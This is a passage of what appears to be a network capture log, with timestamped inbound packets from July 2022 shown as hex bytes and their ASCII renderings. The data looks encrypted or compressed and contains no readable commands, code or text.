c8 90 8d be 07 81 d6 aa f7 a2 74 8b db 35 89 ea cf f1 9b 66 b5 25 bf 4a 78 74 4c 69 b5 5b 1e db f4 55 7a 72 bb 14 38 84 4c 64 d4 db 5f 5f bc Data Ascii: \|r7{}Cz!OM5vs5I~Y7WlX;34#%G1/Q'/ZI;TCM(Afda0d<`p7"-\LO~{UnHMOO(!nAOvt5f%JxtLi[Uzr8Ld__
2022-07-08 04:01:38 UTC	145	IN	Data Raw: 05 21 df b4 ea ab 00 0b 7f 7b fe e9 0d 07 aa bf 28 8d 9f 86 b1 e1 77 00 13 21 8e c1 df 9a ed 11 45 fa a9 73 87 91 62 27 33 ec 8a 2e 67 99 e3 42 89 bb f3 2a 5e 9e 40 4b ec 35 94 e5 b3 2f 68 7f 6e ed 99 c6 7d 92 c0 b4 fc 4a d4 96 38 11 7f cd 9e 19 89 82 a3 91 3b 5e 8b f2 9b 13 c7 7f 0c fb fd fb 66 38 f0 8e 05 25 43 e2 85 f1 c4 c5 6b 84 8a 0a aa 76 fe 55 9b cb 92 1f f6 26 1f b9 9a 19 b3 02 6f bf 84 aa 0a 64 1c 16 dc 2a c9 00 c5 b0 bb 8e de f4 34 f4 34 51 e5 63 61 27 6c 8d 19 55 6d 91 6c 4c 60 cc 34 b7 5f 15 99 8e 9c b5 80 4f 25 8e c4 db 76 54 11 40 76 7c 87 2f 4f 67 cc 21 73 ab 67 9c 62 4c 40 95 d9 e8 87 bd c3 c2 71 6b a9 d9 b1 29 0c 4e cf cb a1 55 37 9d ec aa 12 8a d4 6b 43 d7 04 e2 57 fd 56 5b 4d 3b a8 81 e4 4a ab f4 6f e0 42 d8 90 57 0c 73 87 54 9f fb 63 Data Ascii: !{(w!Esb'3.gB^@K5/hn}J8;^f8%CkvU&od44Qca'lUmlL`4_O%vT@v\|/Og!sgbL@qk)NU7kCWV[M;JoBWsTc
2022-07-08 04:01:38 UTC	146	IN	Data Raw: 3d 6d c5 65 ac 3a ce 46 87 2e 8d b1 13 1c 97 61 6a 59 59 cc ab 9f 1e 87 98 1f 79 00 19 4b f7 df 32 07 2a 5e 54 6a 2b 2c 76 d4 91 18 ad 48 ab c7 96 53 e9 dc 84 09 06 f4 46 6d 8b 13 08 fe 68 2b 1b df ec b4 6f 8f 2b 9b 4b 18 f8 da 28 1e cd 98 ba 64 fd 1c 89 da 39 9a 7a 31 e8 64 98 4c a6 b2 b8 fe 20 df 28 e5 00 6c 4c 5e dc f8 c9 cd 25 18 97 b2 a8 ad 84 bf 38 b6 02 15 0b 28 ce 94 9b ed 0a 6b 7a 52 72 87 0d 6d 8c 5f ab ab 86 61 b9 22 60 4b 93 69 0f 6c ad 4e 92 2c 37 92 cf 15 2e 23 7e 6e f6 b4 47 86 93 c0 28 f3 e1 b8 d1 19 b8 79 ed 5c 3b 6a aa 39 b4 09 45 85 2b 58 11 c1 55 aa 09 b6 fa 66 23 de 0c fe 24 43 7e 8a 5a a8 82 4a 2e 8c 2a 69 54 12 7d 01 ee a0 2c f8 ff dd bb 9c 33 15 e6 24 be 84 b1 27 e7 e7 17 dc b6 c6 ab a9 f7 9a 25 d8 d4 f0 d6 39 78 7f 46 53 1d 62 54 Data Ascii: =me:F.ajYYyK2^Tj+,vHSFmh+o+K(d9z1dL (lL^%8(kzRrm_a"`KilN,7.#~nG(y\;j9E+XUf#$C~ZJ.iT},3$'%9xFSbT
2022-07-08 04:01:38 UTC	147	IN	Data Raw: c4 c2 a4 7c 0f 70 91 60 a8 bf 5a 0b e3 12 6b d0 4b ff 8a 64 18 a7 5a 37 d7 ff c9 b7 6e 16 88 4b 62 0f 51 37 c4 55 9c c8 7d 91 6d c2 1a d6 3f 17 e7 d1 27 34 0e cf f6 0a c5 18 c7 8c 5c 48 17 29 7b ba 45 e4 53 15 5e 2d dc c9 f0 5a 45 8a c8 d6 f1 90 46 80 34 5a af ae d2 9f 44 0a c7 b4 a4 ef ea ea 7e 21 dc 9e a3 60 be 09 06 1f 76 ab b4 d2 55 b9 84 75 d0 4f 19 98 85 6a ac 69 fd 8b 73 dc bf 3e 92 2e 56 87 86 1a bc 94 1d 21 0a b3 d9 09 f8 49 93 e9 02 e5 4f e4 87 96 45 93 24 ce d5 42 dd 4e 3b 9d 05 36 b2 5c 67 fc d7 a6 2c c7 66 c5 5c ac 0f e7 6e 2e 4f 9e 92 72 b8 c6 e2 da a1 00 24 8f 82 8e 39 9c 0f c0 79 98 fe 57 d6 48 70 a1 5d d1 cd c6 de d3 9b 0b b5 25 bf f0 47 75 5e 4f 8b f4 e5 da f4 73 5f d3 c5 75 26 8b 60 bd 3e d9 59 75 a4 f2 7c d0 18 e0 5b 76 b3 51 91 15 34 Data Ascii: \|p`ZkKdZ7nKbQ7U}m?'4\H){ES^-ZEF4ZD~!`vUuOjis>.V!IOE$BN;6\g,f\n.Or$9yWHp]%Gu^Os_u&`>Yu\|[vQ4
2022-07-08 04:01:38 UTC	148	IN	Data Raw: 5e 34 1b dc 65 c0 d4 89 83 10 34 4a 41 44 0e ba e6 cb bf 5c 77 02 f4 2e de 4e 4e 1d 08 f1 92 ed 0a a0 d9 4d 77 eb b2 67 13 93 38 f6 b5 53 b6 f9 4d 21 7b 17 42 c6 cf 11 07 f1 f4 58 dc 60 c1 ab 4b f5 32 90 cc 38 6b fd f3 d4 7e 49 98 3c b6 41 f9 1e 8b c4 c1 ef 79 23 d2 6d 4f 36 66 5d 9c b5 fb c3 6b 0c b8 74 c8 34 64 0a bd ef e1 53 a4 b8 3b b2 81 2c 1a 13 71 89 bd 97 0a a4 88 db 1b 77 36 a2 18 54 55 e9 0e 68 b0 50 ad ed 3d b9 f0 80 d8 f5 df ad 8a 4b 23 bf 98 1c ef 68 81 0c 2f 61 7d ce 5d cf d5 44 08 99 80 ee b7 c6 e9 fe 7d d7 f0 e6 8b 83 9a 69 b4 e1 f7 86 fa 66 58 4d b6 68 11 4b 68 cd 12 0b 14 87 2b c4 59 13 59 bb d6 54 70 23 f0 b8 05 a6 ce 4f 35 3b 91 45 d3 d7 ee 21 58 61 4e 72 22 6e 83 3b c2 de 38 e6 f6 eb 07 c8 2e 56 9d d7 0b 91 89 c4 ee 7f cf a5 45 f6 b1 Data Ascii: ^4e4JAD\w.NNMwg8SM!{BX`K28k~I<Ay#mO6f]kt4dS;,qw6TUhP=K#h/a}]D}ifXMhKh+YYTp#O5;E!XaNr"n;8.VE
2022-07-08 04:01:38 UTC	149	IN	Data Raw: 66 c1 87 14 fb c8 ee b3 02 7e d5 e3 2a c6 07 80 e8 e2 bd df 69 c6 cd 75 99 ec 67 e7 ca 89 51 5a e0 07 75 a9 51 ac ce f0 e6 46 fc ea a3 78 9a 28 df ee b6 cf 51 66 9f 88 59 da 48 7e ef f6 7c 10 ff 5f 6e 4f 9f 1f c6 49 c2 47 97 8f 3d b5 e6 ea ca bc 1f 1b 63 80 8f 4b a9 87 b6 0d 8e e3 57 ee b7 64 a1 4d b1 11 0c 3e 02 39 0c 4f d3 54 3f ae b6 a3 aa 64 2f e8 2d 19 8e 9e bb 47 ef d8 7e 87 7f 30 2e a2 ac f3 1a 8a 61 f4 02 7e b9 74 98 7e f6 ca d9 f7 44 00 04 c0 23 cc ef cc 9e 43 13 97 d7 dc 71 c7 4d 29 2f a0 9e 97 71 45 e7 f5 23 27 15 d2 4e ed 4a 89 ec 33 92 fc 7a 66 d9 bb 5c 8e dc 31 1d 65 c4 1d 51 2b e3 03 2f fe 06 b8 85 5f 5b 0e 88 88 cc e9 31 e6 b4 b4 22 6f ca 7f 90 37 60 b2 c4 33 85 8d 38 7d 8c 99 f7 a8 5f 5f fe 72 f0 de e4 4d 71 e8 63 29 34 da 58 5f 1b 45 18 Data Ascii: f~*iugQZuQFx(QfYH~\|_nOIG=cKWdM>9OT?d/-G~0.a~t~D#CqM)/qE#'NJ3zf\1eQ+/_[1"o7`38}__rMqc)4X_E
2022-07-08 04:01:38 UTC	151	IN	Data Raw: 4c ad 8d 62 c6 ea 6d 4b 04 7c dd f8 aa 72 95 28 08 c1 b3 e2 2a c7 85 95 31 cb e2 3e cd 27 73 ef 72 73 3a 7d 3e 5c 10 78 ae a9 24 46 aa 49 ce 07 c7 f9 f6 b3 0b de 0f 17 d6 94 56 1c 3b 78 5e 23 33 ef 47 34 24 52 47 46 ac 73 24 7a b5 b5 73 11 12 f2 7c 1c 0b 09 8a 44 1e 44 c8 76 b5 1b 1d 5e b4 c6 54 23 6e fd aa 0b b3 bb 19 72 78 dc 16 b3 b4 86 54 46 60 26 34 6b 2d 9f 31 94 d6 38 ac a4 ab 4d d4 63 5d c2 8d 0e dc cb ce f8 10 a3 8e 95 2c 31 12 37 90 c9 ae 66 40 90 bc 8e 56 a9 6a 56 47 93 d7 66 53 44 0b 14 e7 89 3b 5e 5e 11 db 05 ea 3b 5b ae 0e 0e 44 d1 2f a5 a6 a9 f3 e1 52 d2 8b 68 d0 6e ec 95 1e 25 e8 e4 10 5c 83 31 c1 a5 87 cb 1b f8 29 8f 1c 62 c2 53 fb d1 75 29 80 e2 2b 47 3e 6e 77 30 83 86 d3 41 f8 46 dc 27 ae 7d 2f 96 2f 98 e9 04 a7 7f 8a de 35 9e 07 e4 f5 Data Ascii: LbmK\|r(*1>'srs:}>\x$FIV;x^#3G4$RGFs$zs\|DDv^T#nrxTF`&4k-18Mc],17f@VjVGfSD;^^;[D/Rhn%\1)bSu)+G>nw0AF'}//5
2022-07-08 04:01:38 UTC	152	IN	Data Raw: d0 f8 7b 76 61 77 b9 ec 26 e1 c6 5c 4e 60 82 20 03 dc 6d 9b f7 f1 23 09 46 db 72 e0 17 ea 95 46 ba 66 90 00 23 19 1d b0 f6 e6 60 d4 5a 76 44 27 ed ab 3d 7d 9e 0c bf 71 07 45 bc 9c 8b 6c 44 ec a4 62 61 5d 84 09 e3 6d ec 8e 41 dd ad 13 20 92 ff 0b cd a2 64 60 16 8c 5e 1b 4b 97 51 6a a3 17 dd c4 0d 11 62 d0 ca 85 ba 68 84 80 eb 7f 38 a9 3a e5 56 3f 95 d7 0c 53 6d fe a4 69 49 75 51 88 9a 3d cc 64 40 73 a1 a8 23 e6 ae a0 26 a4 d1 97 fd f3 df 9c 68 9d 63 d7 2a 34 31 13 bc 20 2e d8 cd dd cf 94 37 25 b2 1f 53 8b cb b9 b1 fc 56 96 8b b4 9d d9 a0 66 03 6a 3c 9a e5 c9 ff 04 fc 0f f0 2b 80 8a ed e9 4e ed 3c 13 ab 65 69 9f 15 53 a6 8c f8 ce 3d 69 33 b0 2c 65 9f 9a fc 6a a0 c5 73 35 b1 7a 95 a5 ff f5 05 7a bb 67 c3 37 96 fa f4 7f 42 b9 21 d6 ba 14 31 53 d8 cd de 1d 22 Data Ascii: {vaw&\N` m#FrFf#`ZvD'=}qElDba]mA d`^KQjbh8:V?SmiIuQ=d@s#&hc*41 .7%SVfj<+N<eiS=i3,ejs5zzg7B!1S"
2022-07-08 04:01:38 UTC	153	IN	Data Raw: 1a d6 68 74 40 ae b6 90 c3 e3 a2 a1 0f c6 7b 02 b6 38 7d 37 be 01 93 84 76 52 f3 0c ea ac 83 58 e5 94 91 33 3d 43 20 90 dc 83 53 55 92 b6 97 1d ad 42 71 4f e6 97 2c 31 03 4e 57 be a9 64 23 31 55 8f 42 bf 60 02 de 45 7d 07 9f 00 bc c7 da a4 b2 00 b4 d4 37 9a 28 8e d1 74 7f ab d9 14 71 5b a7 53 64 42 54 ff 27 be 0e 8d b7 7f ce 70 56 be a4 2f 52 be 8a bd f7 a3 93 02 0f 00 ea 14 e7 12 e7 7a f7 a4 4a b0 09 0d 98 51 ac 19 78 9d 3f a2 4e 43 50 83 85 c7 c0 d5 1f 1d 78 8f b8 64 0a be e8 bc 86 0d 7b 04 30 4a bd a0 a2 02 3b 0d f2 39 aa 2f 43 7b 93 10 ed 3c 0b d4 36 1a 46 95 54 61 a8 55 4d 5c 74 cc 41 52 ac 68 ad c4 cd 1b 7d 5f 2b 4e 52 f5 1c 53 39 79 5e fc a0 2e c1 a5 ce c6 cb b0 a1 86 23 54 ac 5c f0 94 00 3d fa 40 b2 d4 e0 de f6 47 fc da e3 56 80 eb 1f 07 59 26 9a Data Ascii: ht@{8}7vRX3=C SUBqO,1NWd#1UB`E}7(tq[SdBT'pV/RzJQx?NCPxd{0J;9/C{<6FTaUM\tARh}_+NRS9y^.#T\=@GVY&
2022-07-08 04:01:38 UTC	155	IN	Data Raw: 89 c4 41 ff e7 45 1f ca 89 55 2c 3c 83 ef 04 15 71 3b c0 ec 65 c4 7d 56 65 d7 cc 62 a8 e2 db 72 cf d3 81 fc a4 a6 f0 36 d0 25 a7 47 70 65 5d da 4b 70 91 a2 a6 b7 bb 62 44 cf 6f 16 f2 b9 d5 c5 9d 1b dd c0 99 b0 fd 4d 9f f9 90 ee 53 3e 25 21 c3 21 e5 13 f1 67 6d 2f 28 a7 4b d4 d2 7d a8 97 6c c9 9e 79 71 44 0f fe b1 ff 58 f3 89 5a 4e 22 b3 64 3b 96 c8 6a a3 13 74 38 37 d4 94 74 aa 07 ce 14 05 31 7f 6f 83 72 93 c7 7f 64 19 8d b9 bb 58 45 49 d6 7d c4 d9 f3 c1 46 26 56 48 56 64 fe fa c3 bf 49 03 3c d0 26 fa 70 2a 75 57 99 d8 e8 05 f7 8b 02 6c aa c3 68 1e 8d 0e 9f d2 1f de f1 7f 68 40 40 2d a0 8d 64 63 92 db 30 de 60 c7 a5 1f f1 7d ca 85 37 66 bc bb 87 34 46 97 19 86 09 d8 4c de b2 a4 de 59 06 fb 19 38 1c 60 49 94 cd e2 cb 69 02 be 34 cf 27 17 63 ea ec ef 40 b7 Data Ascii: AEU,<q;e}Vebr6%Gpe]KpbDoMS>%!!gm/(K}lyqDXZN"d;jt87t1ordXEI}F&VHVdI<&p*uWlhh@@-dc0`}7f4FLY8`Ii4'c@
2022-07-08 04:01:38 UTC	156	IN	Data Raw: 20 04 f6 f0 5b 0d cc cb f5 a8 a7 ef 60 4d 79 bb 17 95 58 ab 31 a0 f5 16 cc 04 67 c5 1b fa 0a 64 a6 31 aa 44 5e 43 82 ee b5 cc 8e 50 39 17 a7 44 8e cd 69 2c 6b 57 b8 a9 c7 f9 a7 5d 71 75 da a8 d4 5e ed 6f ec b7 a9 56 c8 27 e7 b6 35 c7 fd 93 0b dd d2 64 97 8b 91 f1 15 b4 84 73 b1 76 13 0e f3 f6 cf a3 9a 89 26 f0 b4 e2 ab 8b df 8b 1b 92 e6 a3 85 a6 c1 ee c3 67 08 ee 22 8c f9 3c 42 bf 16 f4 a7 f1 c0 e1 5f d0 ef f5 26 c4 96 66 63 1a 4c c2 a2 3c f4 c4 f9 f3 0a 71 d2 ec 39 d4 05 a3 e1 c6 ac c3 58 df fa 6d a0 cc 4d c1 b7 fb 25 17 fd 1e 6e 88 66 90 c8 fd ee 5a e9 b6 8e 61 b7 0c db eb a4 ca 1c 0d a8 9c 50 c1 4a 66 ee 96 29 1f e4 45 2f 64 a2 2d f2 78 ee 78 be e9 34 c3 e2 da f7 92 20 3e 56 b4 e0 52 ae bb 87 28 0d 69 d4 11 6d b0 68 ce ba 26 2a 1c 27 5a 11 42 fe 74 18 Data Ascii: [`MyX1gd1D^CP9Di,kW]qu^oV'5dsv&g"<B_&fcL<q9XmM%nfZaPJf)E/d-xx4 >VR(imh&*'ZBt
2022-07-08 04:01:38 UTC	157	IN	Data Raw: 0f 09 7f f6 38 68 fb 97 03 c2 5f 12 67 54 86 c5 39 fe 45 a0 0f 2d 0a 9c ba 40 b6 47 00 a2 b9 df 4e 7e 48 90 be 86 1f a5 1a 10 04 17 ba ea 9c 8d 9e 86 7a 18 3e 40 a9 db fd 16 da 16 84 ed a9 92 63 1e 2d c6 37 64 fb f1 39 45 80 f9 3e c2 0c 5f bf 15 7a 92 0f 4c 33 35 b4 e5 3a 3c d3 93 6f 8b 32 96 fb 4f e6 2b 94 ce 6b 3a e3 ea c4 78 0e fc 5a fa 4e 9a 3b ee fa e6 d4 24 51 b4 4a 24 64 32 0e ef 93 96 a0 0f 75 c4 46 e7 0f 41 3b d7 8e cf 6d 9b 97 58 bc 91 2f 2b 73 13 b7 b5 8d 2c dd 10 16 d4 ac d5 11 c3 96 8f 3a ca e4 19 d4 2f 7e fd 70 7e 3e 49 5b 30 68 56 94 c3 12 29 c7 3c b6 67 a0 9f 9f 8b 27 bb 74 39 a9 ee 78 6c 54 1e 63 7d 65 a4 0c 6c 97 fb d4 9b 66 90 dd d7 e0 9a 69 3a 01 f5 76 07 11 3c aa 6b 45 06 84 5a 91 04 16 51 bc c5 79 38 43 d9 a7 0f 91 a5 03 6e 79 d0 20 Data Ascii: 8h_gT9E-@GN~Hz>@c-7d9E>_zL35:<o2O+k:xZN;$QJ$d2uFA;mX/+s,:/~p~>I[0hV)<g't9xlTc}elfi:v<kEZQy8Cny
2022-07-08 04:01:38 UTC	158	IN	Data Raw: 7d dd 16 12 75 4b 50 23 27 08 87 89 41 9a 33 43 ea 9b 7a c6 36 68 79 11 43 c6 3d 0f 1b c1 33 53 ea 91 d9 9f 36 4f f7 02 06 34 62 eb 9f 33 2d f6 04 d7 4e 1b 78 47 01 9d 0b 09 92 56 d9 11 d1 fe b8 69 55 ed 3d 6b 94 0d f2 b2 af a1 16 b0 ea c6 23 82 72 9e a0 e6 c2 55 29 f5 c4 18 ab 38 0e 9c 9c 62 18 e8 4c 72 53 bf 32 e4 64 e8 75 f5 eb 38 da 82 91 b5 c8 3a 26 45 bd b7 01 9c ce f7 20 82 f9 4a fb bb 75 e2 74 44 fa e9 d9 fe a4 ee ef 1d a2 cc 44 57 5f 6f 8a cb 1e db e1 72 5a 42 b7 32 1e aa 44 bf f6 fc 54 55 16 f1 72 e2 16 c7 b8 4c 9e 7d 9a 05 38 3a 16 81 c9 e1 2b df ac 9b bb df 1b 53 c4 90 b7 00 b7 79 00 08 93 c0 b6 79 47 ff 93 7a 75 4e c8 23 aa 4f f7 80 4b c8 93 0c 11 bd d8 2e e9 b0 58 60 16 8e 56 0f 77 a1 4b 62 a0 4c ea 93 05 09 5d e3 d9 96 ba 76 fe ab 9d 1c 7b Data Ascii: }uKP#'A3Cz6hyC=3S6O4b3-NxGViU=k#rU)8bLrS2du8:&E JutDDW_orZB2DTUrL}8:+SyyGzuN#OK.X`VwKbL]v{
2022-07-08 04:01:38 UTC	160	IN	Data Raw: 25 57 a3 0b 9a 13 cb 55 fb 8b 4d db 74 3c 76 2b d1 33 51 78 5f d2 00 f5 59 2e 07 05 20 49 18 7d b4 eb 2e 1f d8 df 39 a9 19 12 33 7c 83 99 02 b6 20 cf de 09 0d 91 fe 2d ad 99 c9 3c d6 f4 cd db 0a 7f ef 63 9f 00 7f 56 1e 55 1e 9e 8c 10 07 cd 1a bd f9 a1 9d 8e fe 24 23 7a 32 a8 19 57 f2 4c 1b 60 7c 45 b4 28 5e 4f 64 2f 11 8f 4b 1e 34 22 c7 8d db c8 95 b0 df e0 f9 4e a8 d7 77 2e b3 4c 34 c6 61 44 10 9d 1d a4 ad 57 d3 6b 7b f2 04 84 30 fc e1 4c eb 8d ac 81 a8 fd c7 c3 7b c6 ae 5e 14 4f 02 53 ba 67 08 df 6e 28 58 6d 0e 52 5f 9e f7 49 d7 e3 fe ce 9f 40 74 5d b9 95 df 6a 61 ea 6d a1 24 a4 00 60 ff ec 46 b3 aa 40 42 86 d1 c6 78 60 b0 47 61 c7 4b 8f 9c ed 86 cf 4c 1f 28 48 77 fb cf 22 d0 7e a0 79 02 b8 8f 5f b1 af 79 e5 7e 8c ef b3 0b 53 b1 3a 06 26 52 cd 46 ea ae Data Ascii: %WUMt<v+3Qx_Y. I}.93\| -<cVU$#z2WL`\|E(^Od/K4"Nw.L4aDWk{0L{^OSgn(XmR_I@t]jam$`F@Bx`GaKL(Hw"~y_y~S:&RF
2022-07-08 04:01:38 UTC	161	IN	Data Raw: 6e 9f 69 95 c8 e2 02 96 54 1b 54 83 61 16 e9 9a 9c 18 dc f4 0c e1 80 72 17 75 14 ff e1 cf e5 a1 d2 b0 2f bf a2 45 6a 59 45 95 0f 13 e8 f3 73 75 47 a4 65 0d 8d 64 85 f0 5d 41 73 3e 58 4a 44 26 c6 b0 ce ab d7 a9 31 18 3e 3b ad de de 1c 10 6c c5 78 0b da fe 28 4f 59 d1 72 9c c9 4c 5b 43 48 ce 97 32 57 ac a8 b5 51 5b 63 96 20 d0 b9 2c 5c e5 ff 83 22 fb 3b 4d aa 08 e1 41 92 fc 9b b4 b7 af 7c b0 1f 3b f7 d6 96 31 20 33 54 17 65 5c 16 91 d9 d2 d1 28 81 15 0d 4b 8e d9 df 7b 25 c2 f4 b0 f5 34 09 98 36 b1 8a ef 10 3f 90 68 21 80 b6 11 0e 56 3b 31 6f 01 d1 3d ce 63 b9 89 93 b7 13 81 a3 ae 55 79 79 45 a2 19 06 a1 d4 5c 69 62 24 51 df 4a 3c 1b 0e 72 d6 fd 5a 4f 54 d0 b1 a6 af 3d aa 5d b3 7e f8 fb a4 b6 04 f4 46 4d e3 f5 09 32 73 06 e2 df ec b3 45 0d 55 fa 4a b0 fa 36 Data Ascii: niTTaru/EjYEsuGed]As>XJD&1>;lx(OYrL[CH2WQ[c ,\";MA\|;1 3Te\(K{%46?h!V;1o=cUyyE\ib$QJ<rZOT=]~FM2sEUJ6
2022-07-08 04:01:38 UTC	162	IN	Data Raw: 46 52 eb 9e 44 16 78 44 a5 ef d9 c2 50 5f 74 9f a9 65 9e ee 82 1d 76 31 a4 fd ea 9f 6d 92 d8 4e 19 b8 db 54 ac 69 d3 a1 3a dd 75 38 b2 ad 28 e6 37 18 b8 b4 c0 21 b7 b3 8f 2c df 59 b5 c9 4e f5 4f e4 92 93 a9 93 e8 d0 fd ba cc 4e 61 a5 4f 49 ce 5d a4 f8 3a 4f 8c c7 66 5f b5 80 1d c1 4e c7 8b 9e 4b 52 b5 ea e2 da 16 0d 0c 76 9e 8e f9 b6 57 be 1a 99 fe 53 00 a3 72 a1 40 4b 26 eb 22 f5 be e1 b7 25 53 d6 5d 59 43 4f 47 dc f3 db f1 75 75 55 9e 16 27 8b 79 9d 08 db ad 75 3c d6 51 c2 54 c7 b0 74 9e 53 6c 37 ee 0d 37 8d da d8 40 d8 67 43 4d 03 3b 8e fa 74 79 d6 72 aa 5f c3 43 45 65 af 6d 28 b7 aa aa 96 5a dd fd 92 20 50 b7 0d 98 e3 09 4e 26 d9 16 4b 1a 9b 33 63 a2 fa 62 4f 56 8c 53 b6 1f 22 31 f4 bb 23 3d 73 b0 92 46 5b 14 83 cf 54 61 28 81 c2 10 53 72 df d3 45 39 Data Ascii: FRDxDP_tev1mNTi:u8(7!,YNONaOI]:Of_NKRvWSr@K&"%S]YCOGuuU'yu<QTtSl77@gCM;tyr_CEem(Z PN&K3cbOVS"1#=sF[Ta(SrE9
2022-07-08 04:01:38 UTC	163	IN	Data Raw: 77 3c 1c 25 c7 2c 42 78 6c dd 2c ea 4a 2e 44 0b 9e 5e 14 7d 57 ca 9b 3c d8 df b6 bf 8a 31 34 7c c2 bf 7c a5 2b cf d2 17 d3 b2 ea 2d 1b 97 9a 29 dd f4 9c d2 36 7a e4 63 b2 0e 42 78 19 55 a7 ba e4 3e 00 cd f8 b2 72 b5 9a 8e 6a 2e b3 60 25 a8 28 76 66 58 00 60 8f 54 91 23 5e 49 0a 26 ce a3 1b 9e d0 2c 81 9b 8b 48 82 b9 03 cc ed 4e 48 c9 57 07 a7 4c 03 ca 8e 61 18 9d 20 bc 30 7f d3 6b ed fb 88 90 30 fc a0 5e 67 99 ac 81 08 d6 84 d5 7b c6 ae 77 ea 5e 0a 53 18 7b e7 f2 7a 28 36 73 a3 79 5f 9e 85 54 9b f5 ea ce 1f 5e d9 76 b5 95 e6 6a 55 ca 61 a1 51 81 2d 40 a3 6c 1c 97 e9 6b 12 06 6d e1 d6 7b f4 c7 67 e5 54 a3 8c ed b2 db 56 31 38 48 85 ee 46 38 c0 7e 7f 6b 2c be 8b 5f a9 8b f3 c6 6e 8c 12 98 88 51 a1 3a bf 09 7c cb 56 ea a6 2c 30 8e f4 2c 47 2d 64 70 20 81 56 Data Ascii: w<%,Bxl,J.D^}W<14\|\|+-)6zcBxU>rj.`%(vfX`T#^I&,HNHWLa 0k0^g{w^S{z(6sy_T^vjUaQ-@lkm{gTV18HF8~k,_nQ:\|V,0,G-dp V
2022-07-08 04:01:38 UTC	164	IN	Data Raw: 78 3e 77 95 e8 98 75 f8 92 ee f4 f2 84 5f 8a f0 bd 4f 9f bc 20 af 73 3f 8c 5f 98 46 19 15 4b 15 1a ec 23 f5 d3 b9 d5 3f dd e4 c1 c7 1a 41 23 be 67 53 03 26 96 30 d0 a1 90 a9 61 98 d7 37 4d c2 8e 9c 36 74 82 78 57 5a 8a 0f b5 63 81 f2 45 dc 0b 5b 44 48 61 89 27 43 ab a8 3f 5c d2 79 91 20 a6 9b 00 73 e2 ff a2 20 d7 14 4d aa 55 fe 82 be fc 9b 83 a1 62 49 b0 1f ee fc 07 a3 32 20 bf 48 9d 46 4b 16 2b c9 5b cb 3f 81 34 0c 5c 8b ce df a8 3d ee db 87 f5 c4 09 bd 17 86 8a 00 1d 25 be 3f a1 f4 a7 04 10 41 3b 8b 42 1d c1 2a ce 8e a6 95 83 b0 13 4a b3 4a 74 7e 79 bd a8 22 10 a6 d4 f9 78 6d 16 56 df ea 32 63 04 75 d6 bc 4c 2b 7a d1 b1 6a ae 22 83 5c b3 b2 f9 e6 a6 b1 04 38 47 47 ef 3f 08 56 74 09 ee d8 ec 7e 44 07 59 fc 4a d4 fd e6 95 1a cd 54 21 4b dc 0b af 36 87 97 Data Ascii: x>wu_O s?_FK#?A#gS&0a7M6txWZcE[DHa'C?\y s MUbI2 HFK+[?4\=%?A;B*JJt~y"xmV2cuL+zj"\8GG?Vt~DYJT!K6
2022-07-08 04:01:38 UTC	165	IN	Data Raw: b2 d1 c8 97 09 a1 5a cf 07 80 56 1c 95 ec 15 6c 73 d5 6b 45 eb 82 34 30 c9 54 57 6d cd fd 81 e4 d0 8e c8 7d 30 63 f0 92 5f 0c a7 e8 7d 9f fb 7c 39 fa 9e 6f d7 51 96 2d 2e 08 fb ec ce e9 4e 13 5d b1 35 46 64 5a fc 3d a1 9d 80 3b 53 f5 20 d1 55 99 6a 44 66 a4 e7 ae 72 a2 56 91 28 2d 75 92 e5 7e a6 32 3d 2e 48 49 e9 51 3d f7 6d d7 65 23 bc 9d 5f 5f 0a fc 55 58 40 ff 90 8e 5b b7 3a 9a 0b 73 49 40 7b ec e7 3e 9b eb 24 1b 2f 6b 72 36 01 9a 10 65 31 4b aa 43 cf 42 19 fc 16 ad 13 35 62 31 32 99 40 c6 5d ba 01 c7 7c 0b 70 75 74 a0 73 c1 1b c7 0b 4d 49 cd fd 8a 44 38 45 79 9f d1 dd e8 46 6f c6 ec 61 e0 51 30 20 cc 9d bd 16 76 99 6d bf 5d fb 2e 11 c7 22 2d 9c 08 d4 0a 29 c5 18 b9 a4 a5 49 17 2e 51 f4 3a e6 5b 1d 5a c9 5e cb f0 5a df a9 e5 0b d6 a3 a0 8a 34 1e ea 52 Data Ascii: ZVlskE40TWm}0c_}\|9oQ-.N]5FdZ=;S UjDfrV(-u~2=.HIQ=me#__UX@[:sI@{>$/kr6e1KCB5b12@]\|putsMID8EyFoaQ0 vm]."-)I.Q:[Z^Z4R
2022-07-08 04:01:38 UTC	167	IN	Data Raw: ff 62 bf fa 9a 4f 6c 8d 63 b8 0d 22 1d 67 bb 23 20 73 48 92 ec 5c 45 8d dd 54 dd ba 81 c2 0d 53 88 df 29 45 59 ef cb b6 15 9d 08 bb 1b b7 8b a8 d7 22 31 60 33 38 22 93 12 50 3b 47 42 1b 21 3d 2f 4f b5 93 3b 28 13 86 b2 4c 79 7f b5 70 8d 9c 0c a7 84 af 79 00 06 57 de 26 df 01 99 77 c4 14 fe 0f 76 d0 b1 a6 a9 50 ac 7c a0 7e ea fa f4 2b 04 f4 46 4d a5 3b a3 ed 3b 02 f0 de 68 2e 45 0d 55 fa 5b 00 f1 db 11 1c df 98 20 41 d0 0d 2f fa 90 b8 b6 30 17 06 a0 4c a6 a9 90 07 a1 df 38 ef 4a 13 ce 51 ce fc e9 0d 27 18 17 28 9b a0 5a 98 46 7f 12 15 0b 08 bf be 1b ed 03 45 9e aa 9f 89 19 47 0a 21 ca aa 06 65 8f c3 ae 4a 61 fd 38 41 bf 68 b2 ed b5 92 d9 15 9d 08 86 60 fb b9 6f 7f 92 c0 ae d9 71 e6 7c 19 bf 72 d9 9e 39 6a aa a3 11 24 41 83 c7 9b 02 ce 43 8a 85 9c fa 66 bc Data Ascii: bOlc"g# sH\ETS)EY"1`38"P;GB!=/O;(LypyW&wvP\|~+FM;;h.EU[ A/0L8JQ'(ZFEG!eJa8Ah`oq\|r9j$ACf
